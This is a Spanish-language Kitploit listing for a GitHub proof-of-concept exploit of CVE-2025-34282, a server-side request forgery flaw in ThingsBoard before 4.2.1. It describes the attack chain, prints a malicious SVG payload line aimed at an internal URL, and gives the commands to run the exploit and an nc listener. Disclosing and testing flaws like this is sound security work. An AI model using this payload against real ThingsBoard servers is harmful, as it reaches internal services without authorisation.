Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
thingsboard-ssrf-cve-2025-34282 — Exploit PoC para CVE-2025-34282 - SSRF en ThingsBoard mediante la carga de imágenes SVG | Kitploit
Herramientas/GitHubGitHub/mathitam/thingsboard-ssrf-cve-2025-34282
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónRed Teaming
GitHubmathitam/thingsboard-ssrf-cve-2025-34282

thingsboard-ssrf-cve-2025-34282

Exploit PoC para CVE-2025-34282 - SSRF en ThingsBoard mediante la carga de imágenes SVG

Ver Repositorio
3hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-34282 — ThingsBoard SSRF mediante carga de imágenes SVG

Resumen

Vulnerabilidad de falsificación de solicitudes del servidor (SSRF) en ThingsBoard IoT Platform en versiones anteriores a 4.2.1.

Un atacante con acceso de Tenant Admin puede subir un archivo SVG manipulado que contiene una referencia a una URL interna a través de la galería de carga de imágenes. Cuando ThingsBoard procesa el SVG en el servidor, recupera la URL referenciada, lo que permite el acceso a servicios internos no expuestos a Internet.

CampoDetalles
CVECVE-2025-34282
Versión afectada< 4.2.1
Versión corregida4.2.1
Puntuación CVSS6.9 Media
CWECWE-918 (Falsificación de solicitudes del servidor)
Proveedorhttps://thingsboard.io

Cadena de ataque

  1. El Tenant Admin sube un SVG malicioso a POST /api/image
    • El servidor procesa el SVG y realiza una solicitud saliente a la URL incrustada
  2. Se crea un widget personalizado que incrusta el publicLink del SVG mediante una etiqueta <object>
    • El renderizado del widget también activa la recuperación en el servidor

Payload SVG

El payload ssrf_localhost_5555.svg incrusta una referencia a una URL interna:

root@kitploit:~
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />

Al subirlo, el servidor de ThingsBoard obtiene http://127.0.0.1:5555, lo que confirma el SSRF.

Uso

Requisitos:

root@kitploit:~
pip install requests

Ejecutar:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>

Ejemplo:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...

Inicia un listener para capturar el callback del SSRF antes de ejecutar el exploit:

root@kitploit:~
nc -l 5555

Referencias

  • https://www.cve.org/CVERecord?id=CVE-2025-34282

Autor

Tamil Mathi T.

Descargar herramienta